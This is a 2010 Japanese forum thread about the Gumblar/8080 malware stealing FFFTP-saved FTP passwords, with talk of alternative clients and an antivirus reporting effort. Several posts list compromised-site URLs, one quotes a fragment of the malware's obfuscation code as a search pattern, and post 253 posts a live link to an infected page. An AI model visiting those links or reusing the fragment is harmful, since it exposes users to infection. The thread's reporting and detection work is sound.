でも、今回のに関係なくクライアント変更したりSSLなFTPとか別のプロトコルに変えたりIPでアクセス制限かけたりした方が無難だよね
鯖側が対応出来てれば、の話だけど
FTPのID/Pass盗み取るマルウェアは8080系だけじゃないんだから

まあFFFTPの作者さんのこういうアナウンスをするっていう決断は素晴らしいと思う

235 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:58:16
使ってるWebサーバのFTPは、SSL対応してないないな
FFFTPのレジストリ見たけどhistory01〜04の項目もあって
IDPW入力した履歴が残ってるかも?

236 :名無しさん@お腹いっぱい。:2010/01/30(土) 16:58:31
もうバージョンアップしないってことだから、どのみちFFFTPからは離れざるをえないけどな


237 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:01:50
今回の告知でわかることは、もう更新はないってことだからな>FFFTP

238 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:06:39
FileZilla,SmartFTPでおkだろ

239 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:12:19
FileZillaはPass保存してたら暗号化されずに平文で保存されてるぞ
FFFTPと同じ危険性がある…っていうかもう既にFileZillaから盗み取るやつあるんじゃなかったっけ…?

240 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:14:45
どのFTPツールが無難なのかね?
履歴にもIDPWが残るタイプだと危険かね


241 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:14:47
FFFTP削除してしまって、レジストリみてもFFFTPがないのですが、
初期設定だとINIファイルに保存設定になってるのですか?
それだと安心なのですが。インストールしたフォルダもなくなってて
確認のしようがないのですが。。。

242 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:15:34
ini保存もヤバいんかね。
つーか他にffftp相当の使いやすさで、SFTP対応で、日本語メニューで、アカウント情報が盗まれにくくて
というのが全て揃ったftpソフトって何があるかね?

243 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:17:58
>>241
初期設定はレジストリ
アンインスコをプログラムの追加と削除から行ったのなら、レジストリも恐らく消えてる。

レジストリから情報盗んでるとすると、完全に日本狙い撃ちされてるってことになるな。

244 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:18:13
>>242
ないものはつくるしかないと聞く

245 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:19:01
>>243
ありがとうございます、安心しました。

246 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:20:04
FFFTPはFileZillaと違って更新が途絶えて長いのと、日本での需要の高さから
格好の狩場として標的にされてる節がある

貧乏人はインターネットするな時代になりつつあるような

247 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:21:34
更新の長期停止されたFFFTP集中砲火とかよく調べてやがるな、このマルウェア製作者、
むかつくくらいだ

248 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:24:52
sftp使えってこった

249 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:25:30
それもソースコード解析して暗号化してたパス解読してるんだから…よくやるねぇ
それだけ稼げてるんだろな

250 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:26:00
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー[日本版], 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』(3ヶ月間の無料試用期間あり)などをどうぞ。

251 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:29:31
genoが出たときはここまで厄介なバージョンアップ遂げるとは思わなかったな

252 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:34:07
初代Gumblar(通称geno)と8080系はまったく違うものと言っても良いのに、バージョンアップと言うのはこれ如何に
作者も恐らく別人だろうし

253 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:36:43
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
http://kasim.kashima136.com/z19z00703/?link/news/ffftp.html

この辺も読んどいた方がいいかも。

254 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:39:39
>>253
お前最悪だな
おまえ等踏むなよ

255 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:40:58
>>253
危険
飛んだらダメ

FFFTPとは全く関係ない、8080系に感染済みサイト


念のためにスクリプト切っといて良かったw

256 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:43:48
感染〜感染

257 :名無しさん@お腹いっぱい。:2010/01/30(土) 17:46:10
だれか規制要請板に253通報してきてくれ
俺今出先で携帯なんで無理
これは悪質だ

258 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:07:41
危ない危険て言ってるけど、テキストブラウザで開けるようにしとけば
まず問題ないんでないの
それか通常ブラウザでもスクリプト類offにしとくとか

259 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:08:31
>>253
ひどいスパムサイトだな

260 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:13:10
いびきの原因

261 :へたれ発掘屋:2010/01/30(土) 18:16:18
コードの微変更で発掘しにくくなってきちょりまつが・・・
皆様如何お過ごしでせうか?

とりあえず最新型っぽいのを1件投下
「BAL BAL NET」
tp://www●balbal●net/
※サイト内全滅の予感

つーほー&検体提出ヨロ


262 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:23:59
   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)..    `'ー---‐´

 ガンブラー      トトロイ
(2009 〜 )      (2010 〜 )

263 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:29:49
FFFTP並みに簡単なソフトないよな。
開発続けて欲しいわ。

264 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:30:37
>>261
二段目のスクリプトの中身がNothingになっていた件ww

265 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:32:19 ?PLT(12031)
FFFTP使ってるとかどんな情弱
FTPクライアントはFireFTP使ってる

266 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:43:01
>>261
おつ!
シマンテックに提出しました。

とりあえずVirSCANの結果
http://www.virscan.org/report/7626fd91e4baba2333ade30e0eeed687.html

267 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:46:25
他のFTP使っても結局レジストリかiniファイルに保存されてしまうから危険度は変わらないよね


268 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:52:50
【FFFTP】 FTP接続時のパスワードが抜き取られサイトの改竄相次ぐ 【Gumblarウイルス】
http://tsushima.2ch.net/test/read.cgi/news/1264841726/

269 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:54:29
暗号化されてれば危険度は減るがな

270 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:59:27
FFFTPもパスワードは暗号化されてレジストリに登録されてたけど解析済みなんだっけ?


271 :名無しさん@お腹いっぱい。:2010/01/30(土) 18:59:53
>>267
有名ソフトほど狙われやすい
マイナーソフト使えば使うほど狙われにくい

FFFTPがいちばん日本で普及してるから狙われたんじゃね?
おれはSFTP使えるWinSCPメインだけど

272 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:00:04
ホームページビルダーは大丈夫?

273 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:01:50
>>270
一般的なソフトのパスワード保存って、
もしくは簡単な独自アルゴリズムで暗号化・複合してる、
もしくはソフト本体側に埋め込まれた共通鍵だけだからデバッガ使って解析されたらばれる

暗号化っていうよりエンコードに近い

274 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:04:10
そかーネットがめんどくさいものになってきたな


275 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:15:30
>206
一昨年

276 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:18:57
>>261
McAfee送信完了

277 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:29:18
>>261
avastにチェストから送信しました

278 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:30:43
>>270
オープンソースだから誰にでも分かる

279 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:32:48
オープンソースだから暗号化の部分だけ書き換えて使うって手もある

280 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:35:18
WinSCPダウンロードしに行ったらソースも公開されてるみたいだね
そのうちやられるんじゃないか?


281 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:51:03
パスワードを保存するとかそういうのは全部アウトじゃねーの
パスワードデータベースをパスワードで保護するとかしないといかんな

282 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:02:02
脳に保存しとけばいいだろ

283 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:03:52
>>281
そうみたい
パスワードを保存するのが危険だって
感染実験してみた人が書いてた
FFFTP以外にもメジャーどころは情報盗まれたみたいだよ

284 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:08:42
マジかFFFTP・・
しかし毎回パスワード打つようにしてもキーロガー仕込まれてたら
意味無いのですよね

285 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:10:13
トークン使え

286 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:17:31
その為にプロセスコントロールでKBを監視するのが最近の流行

287 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:20:35
WinSCPで鍵認証の俺に隙はなかった

・・・けど秘密鍵まで持ってかれたらアウトだよな

288 :へたれ発掘屋:2010/01/30(土) 20:22:40
朝日オート(最新型)*再々改竄*
tp://horizon●f00●jp/

SELECT ROOM(GNU GPL)
tp://selectroom●net/2007/10


最新型が釣れないよ・・・ orz

289 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:27:07
>>288
<script>タグをコメントアウトしてるのは何でだろう?
管理者のとりあえずの処置?
それとももともと?

290 :名無しさん@お腹いっぱい。:2010/01/30(土) 20:37:20
あれ、こないだもコメントアウトしてる所なかったか

291 :名無しさん@お腹いっぱい。:2010/01/30(土) 21:42:49
キーロガーって、叩いた順番を覚えてるだけであって、
パケそのものを盗ってるわけじゃないんでそ?
だったら、短文登録しておいて、たとえば「パ」→「pass」みたいに
変換して使えばバレなくない?
あとは、1文字おきに打って、マウスでカーソル動かして残りを
埋めるような形でパス打つとか。
上の例だと「ps」→「pas」→「pass」

292 :45:2010/01/30(土) 21:45:22
>>261
めるぽ

293 :名無しさん@お腹いっぱい。:2010/01/30(土) 21:45:38
馬鹿がいる・・・

294 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:17:38
ニュー速に貼られてたコレは?
://kasim●kashima136●com/z19z00703/?link/news/ffftp●html

295 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:26:39
>>294
http://pc11.2ch.net/test/read.cgi/sec/1263865118/253-

296 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:26:46
>>288
そこの中古車屋は修復してまた改竄なの?それとも放置なの?

297 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:27:01
> 253で貼られて叩かれてますが

298 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:45:52
普段Fedora+Firefoxでブラウジング、サイト更新時は
CMSを使っている俺に隙はなかった
みんな無理せずに出来の悪いOS投げ捨ててこっちにおいでよ

PDF閲覧ソフト・Flash再生ソフト・Java?なにそれおいしいの?
プロプライエタリの塊なんぞ最初からノーサンキューです

299 :名無しさん@お腹いっぱい。:2010/01/30(土) 22:46:51
へぇ そいつぁすげぇや

300 :45:2010/01/30(土) 22:52:01
>>288
上:くこから ttp://f00.jp/contact.html
下:めるぽ

301 :名無しさん@お腹いっぱい。:2010/01/30(土) 23:01:46
>>295
>>297
すまん。
リンクあぼーんしてたんで見えてなかった。

302 :名無しさん@お腹いっぱい。:2010/01/30(土) 23:04:13
>>285
個人でトークンって使えるものなの?

303 :45:2010/01/30(土) 23:08:27
>>261
かすぺ
> Hello,
>
> index.htm_, index2.htm_, profile_index.htm_ - Trojan.JS.Redirector.at
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> The answer is relevant to the latest bases from update sources.
>
> Please quote all when answering.
> -----------------
> Regards, Baranov Artiom
> Virus Analyst, Kaspersky Lab.

304 :45:2010/01/30(土) 23:18:05
前スレでめるしてたんだけど、最初っからフォームでいけばよかった。。。
>>288 上 対応の返事あり。404を確認。

305 :へたれ発掘屋:2010/01/30(土) 23:23:15
>>296
朝日オートの件だが
改竄→無効化(コメントアウト)→再改竄・・・
というループを繰り返してる。

※最新型と1コ前の型の違いは「eval」の有無

306 :へたれ発掘屋:2010/01/30(土) 23:39:44
>>304(45)
乙!!


そろそろ釣れるかな?
".replace(/\^|\$|@|\)ig," "eval("


307 :名無しさん@お腹いっぱい。:2010/01/31(日) 01:22:03
>>16
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
が白紙になってるけど。死亡?

308 :名無しさん@お腹いっぱい。:2010/01/31(日) 01:25:15
>>307
1時間くらい前から、白紙になってるね。

309 :名無しさん@お腹いっぱい。:2010/01/31(日) 02:07:16
アメリカ研究振興会
ttp://www●amsf●or●jp/index●html

砂川商工会議所
ttp://sunagawa-cci●com/index●html

大阪府中小企業団体中央会
ttp://www●maido●or●jp/index0●html

どれもevalつき

310 :名無しさん@お腹いっぱい。:2010/01/31(日) 03:15:11
>>298
たんにマイナーだから狙われないだけ
もしFedra+FirefoxがWindows+IEなみに普及してたらターゲットにされて攻撃されまくる

311 :名無しさん@お腹いっぱい。:2010/01/31(日) 03:21:14
ここで逆転の発想
弄られる前にサイトを閉じる

312 :名無しさん@お腹いっぱい。:2010/01/31(日) 03:24:47
Fedora(笑
Gentooだろ常識的に考えて

313 :へたれ発掘屋:2010/01/31(日) 04:07:17
寝る前に投下・・・と。

サイト名省略w(きっと最新型)
tp://www●3renshinan●com/


最新型の検出状況
http://www.virustotal.com/analisis/103d463d367bd9f68b9bcf93ed1ae58f0ca4debe38213bdcf70536a2f713e412-1264873639


314 :45:2010/01/31(日) 05:43:55 ?2BP(1236)
>>309
めるぽ
めるぽ
めるぽ

>>313
めるぽ (スパム逝きの可能性大)

315 :名無しさん@お腹いっぱい。:2010/01/31(日) 10:04:56
JRE6Update17での感染報告ってありますか?
イマイさんにリダイヤル攻撃されるんですね

316 :名無しさん@お腹いっぱい。:2010/01/31(日) 10:14:11
GENOウイルスによる改ざんじゃなくてGENO自体がウィルス改竄している件

詳細はWikipediaの編集履歴を参照

317 :名無しさん@お腹いっぱい。:2010/01/31(日) 10:55:21
新型はdocument.writeが無くなったんだね

318 :名無しさん@お腹いっぱい。:2010/01/31(日) 11:45:05
gnome氏がキレてる
辞めてほしくないなあ

319 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:00:52
新型( >>309 >>313 )Dr.WEBで全機撃墜(JS.Redirector.2)。

普段あまり頼りにならんけど、8080引っかけたい人はどうぞ。
ttp://drweb.jp/support/link_checker.html

320 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:02:52
>>316
じゃあ業務停止命令されなきゃな
やはりGENOが去年からのウイルス騒動の元凶じゃないのか?
ガンブラー系や8080系作ったのもそいつらだって疑われて当たり前だ

321 :geno:2010/01/31(日) 12:04:06
さくらってALFTP対応してる?
してるなら乗り換えたいな

322 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:32:56
>>318
ボランティアでやってるのにここまで求められちゃかなわん、と
ふくれているのかもしれんが、
「当該記事の修正を迫」った人への執拗なまでの当てこすりといい
「みんな助かってます、どうか止めないでください」との声が上がることを
期待しているかのようなあざとい誘い受けといい、ガキかよ、と。

そんなにやってらんないんなら止めりゃいいのに。誰も頼まないから。

323 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:38:26
フリーソフト作ってたりするとわかるけど
最近の一般ユーザーはマジキチ

324 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:41:05
わかるわ〜

325 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:42:47
事情がよく分からんのだが、FFFTP作者本人からの抗議でもあったん?

それとも第三者なのか

326 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:44:28
みんな何の話してるの?Gumblar Checker?

327 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:46:37
カッカするのは分かるが、確かに
当て擦りっていうの?
あのしつこくてくどい皮肉めいた書きぶりは
ちょっと大人気ないわ

頭冷やして、このまま続けてくれとは思うけど

328 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:47:33
>>322
いやあ俺は助かってるからさ
そんなあてこすりは眼中にはいらないほど助かってるから

サイト持ってるから気持ちわかるところもあるし
彼の文体も好きなんだよね

329 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:48:29
>>326
gnomeさんとこ。

なんか誤解を与えかねない(?)記事があってクレームがきたみたい。

330 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:51:03
>>325
第三者だろ、曽田さんはそこまで暇じゃない

331 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:52:29
>>329
d。

332 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:55:21
GENOざまぁあああああああwwwwwww

333 :名無しさん@お腹いっぱい。:2010/01/31(日) 12:59:45
>>330
だとしたら、それこそ「誤解を招く表現」だと思うんだけど

あれだと普通にSota氏から抗議がきたように読めちゃうんだが

334 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:01:09
>>333
お前みたいな反応をかえすやつといちいち付き合ってられん。

335 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:02:18
切れた第三者が曽田さんに謝れとか見当違いなことふっかけてきたんだろ


336 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:02:21
とりあえずおまいらソースを出してくれ

337 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:07:20
いや別に無理に付き合ってくれなくてもいいけど

ただ、あそこで誤解を招く表現の上塗りしちゃってどうすんの?と

俺がSota氏だったらああいう書かれ方はちょっと迷惑かなぁ、と

今まさにそういう煩わしさに巻き込まれているGnome氏なんだから
余計慎重になってほしかったな、と

338 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:07:26
人名出されても何のことかわからん

339 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:09:02
>>322
雑音って一度気にし始めるともうだめなんだよ
そればかりが気になってしょうがなくなる
どんな人でもそう
やめるやめないは本人の好きにすればいいが、お前のそのコメントはだめだな
こんなところでぬるま湯につかってるんだから

340 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:10:02
>>337
迷惑も何も本人はブログ以外ほとんどやってないんだから、迷惑もくそもないだろう


341 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:12:30
スゲー論理だなw

342 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:12:41
個人ブログなんだからいいじゃん
企業や報道機関が無知でいい加減な報道しても放置状態なのに

343 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:14:33
情弱「FFFTPの作者が悪いGENOが悪い」

344 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:14:53
真っ赤な顔して熱湯風呂入ってる人って大変ッスね

345 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:16:18
情弱が多くて大変だな

346 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:17:07
変な正義感ふりかざすやつが増えたよな、ご本人にかわってクレームつける
俺かっこいいとか

347 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:20:40
>>325
スレッドとか立ったなかった?
文章を一部抽出したような内容で。

348 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:25:20
ニュース速報あたりに立ってたな、普段ソースソースうるさいくせに
中途半端に引用された文章にくいついて盛り上がってた

349 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:31:02
よく分からんけど、


どこかで「FFFTPは危険!」みたいな注意喚起スレが立って、
gnome氏の記事が(氏の意図にそぐわない形で)部分引用された

gnome氏の「FFFTP自体がマルウェア」とでも言いたげな記事を読んだ
(そう誤解した)第三者が
「FFFTP自体は悪くないだろ!記事を書き直せ!」とブログに凸した

gnome氏、「お詫び」という形で、ささやかな反論


みたいな流れ?(んで、FFFTP作者のSota氏はこの件に絡んでいない)

350 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:32:34
中途半端な知識持ちって一番たちが悪いな・・・

351 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:34:28
誤解乙
終了!

352 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:37:26
まぁでもあの書き方だとオレも Sota さんからクレーム来たのかと普通に思っちゃうわ。

353 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:47:31
>>352
そうか?
それだけは無いなと読めたが

354 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:51:47
お前がそう思うんなら(ry

355 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:56:56
実はクレーム凸した人がこのスレに居るとか

356 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:57:25
FFFTPが悪いみたいに思い込んでる人が増えてるみたいだな
このスレにもいるし
初期の頃から分かってることだがその他のFTPクライアントも同様なのに

357 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:58:21
実はgnomeも(ry

358 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:58:28
最初に記事にしたアソコが悪い。

359 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:01:47
以前見たもっとまともな記事は
記憶したパスワードが盗まれる対象のソフトを複数あげてたな
サイトアドレスは記憶にないけど

360 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:12:00
ホームページビルダーもおわったな

361 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:17:31
突然で申し訳ないんだけど、
自分のサイトはヤフージオシティーズが提供している
ジオクリエーターで製作しているんだけど、
こういうタイプのサイトもGumblarや8080系のウイルスによって
改ざんされる事あるんですか?
アレ、PCから直接HTMLファイルや画像ファイルが開けて便利なんですけど
とっても心配です。

ちなみに使用ブラウザはIE8
アドビリーダーもフラッシュも最新版に更新済み
(Javaスクリプトはリーダーのみ切っている
IEはお絵かき掲示板使用の為切っていない)

362 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:21:03
Gnome使ってるけど、マジ意味わからん。

363 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:21:41
KDEつかおうぜ

364 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:24:29
いやいやLXDEで

365 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:28:09
つxfce

366 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:33:10
GUIなんて時代遅れ

367 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:33:18
gnomeのスルー力のなさというか、意外に耐性が低かったのに驚き。
ああいう口調や文体を使うってことは、そのあたりに相応の自負があってのものだと思っていたよ。

368 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:37:48
>>367
それはちょっと思った
本人が想定してたより,あのブログの影響力が大きくなりすぎてたのかもね

369 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:38:40
gnome最新版は勝手に文章を書くのか

370 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:44:17
>>369
ワロタww

371 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:51:56
>367
どうも初めてではないみたいだしな
耐性つくか脆くなるかで、Gnomeは後者なんだろう
ここは生ぬるく見守ろうぜ

372 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:00:51
ほびーちゃんねるって感染した?
ttp://hobby-channel.net/index.php
見れないんだが

373 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:07:53
メンテでPHPやSQLが停まってるとかじゃね

374 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:08:06
Gnomeは去年のGENOの時も大量の馬鹿の特攻くらって愚痴ってなかったか?
毎度毎度大変だよな

375 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:09:17
>>374
Nifty感染疑惑の時かな

376 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:09:54
>>373
そうでしたか、すみません。

377 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:19:47
ガンブラーチェッカーは何で今見られないんだろ

378 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:22:17
このウィルスってロシア人が作ってるの?それとも日本人なの?

379 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:23:08
少なくとも日本人ではないな

380 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:24:11
大陸系

381 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:29:16
ブログのurlplz

382 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:43:18
チキンの日本人が作れるわけない

383 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:45:51
感染改竄されてる所って同じweb屋が請け負ってるんかな?

384 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:46:55
チカンの日本人に見えた
これもウイルスのせいか…

385 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:52:02
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。


386 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:55:52
その有志がウィルス作って・・・ゴクリ

387 :名無しさん@お腹いっぱい。:2010/01/31(日) 15:56:52
さらに上はいるからな。


388 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:00:19
>>377
自分もなんだか心配だ

389 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:00:43
レジストリ完全消去ツールも発表とか、対応スゲーなあ
ボランティアなのに、有り難いことだ

390 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:02:07
まぁまたやられるんだけど
他の使っといたらいいよ。

391 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:03:37
>385
オープンソースの強みだな
もう乗り換えちゃったけど

392 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:04:26
>>383
そういうところもあるだろうし
違うところもあるだろう

393 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:06:21
>>391
強みでもあり、解析されるという弱みでもあり…ホント諸刃の剣だな

例のブログ、お詫び記事がお詫び記事に見えない件

394 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:11:56
ブログみてきた

Sota かわいそす

ってか FTPソフト 乗り換えるべきなんでしょうか?


395 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:12:35
FFFTP使っていてやられちゃうような人は
何使ってもやられるから気にすんな

396 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:14:58
>>394
乗り換えるべき
>>395
そんなことないね。


397 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:16:02
感染しなければどうと言う事は無い

398 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:17:30
不安がって騒ぐ人って、まず感染予防してるのかそっちのほうが心配

399 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:19:06
>>394
その前にちゃんと対策すれば大丈夫

400 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:23:11
>>394
心配ならOSをMacかLinuxに変えれ
Windows由来の脆弱性は突かれないから

401 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:25:25
まぁ騒いだおかげでFFFTP改善されたともとれるし結果オーライでね?

402 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:35:52 ?PLT(12031)
GumblarChecker 2は色々な理由で現在停止されています、そのうち復活するかもしれません
ソースコードは公開してるので気が向いた人はそのまま使うなり改造するなりして使ってください、著作権は放棄しています
ttp://www.dotup.org/uploda/www.dotup.org610235.rar.html

403 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:46:59
windows9x系はどう対応すればいいの?

404 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:47:21
>>402
今までありがと。

405 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:47:33
PCを投げ捨てます

406 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:49:31
>>402
え?理由はよくわからないけど、感染してたの?
理由教えてほしいな・・・他の人も使ってただろうし・・・

407 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:54:27
>>403
プラグインでまだサポートのあるのは最新に
その他ははアンインスコ
ルータ噛ます
ブラウザは最新版でいまだに使えるOPERA10.10にする……とかかなぁ
そもそもこのスレで話題の奴は9xで感染拡大するのかわからんけど

408 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:56:20
ふむふむ。これが噂のPHPというやつか。

さっぱり分からん。

409 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:58:49
>>407
ありがとう

410 :名無しさん@お腹いっぱい。:2010/01/31(日) 16:59:35
>>385
http://mag.matrix.jp/mag/queen/log/soft/eid743.html
この仕方がいまいち解らないんだけど
ソースとバイナリってのをFFFTPのフォルダーに入れるの?
誰か説明して下さい
お願いします。
やり方を1から10までお願いします。

411 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:02:21
> やり方を1から10までお願いします。
甘え過ぎだろw

412 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:03:03
>>410が管理してるサイトにはアクセスしたくないな

413 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:03:07
>>402
JavaScriptやcookieが不必要で使い勝手が良く、重宝しておりました。
いままで利用させていただき、大変ありがとうございました。

これからはaguse.jp使うしかないか。

414 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:06:05
>>412
違いますよ FFFTPを配布してるサイトのリンク先です><

http://www2.biglobe.ne.jp/~sota/
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
マスターパスワードを使用することにより、FFFTPにパスワードを記憶させた時の安全性が向上しています。
以下のサイトです。改良&公開ありがとうございます。
にょろぷにらん・FFFTPパスワード漏れ対処版作ってみた
http://mag.matrix.jp/mag/queen/log/soft/eid743.html

415 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:07:19
えっ

416 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:12:56
>>414
バーカバーカ

417 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:13:01


418 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:13:54
>>416
本当に解らないんです><

419 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:15:08
日本語も読めないのか‥‥‥

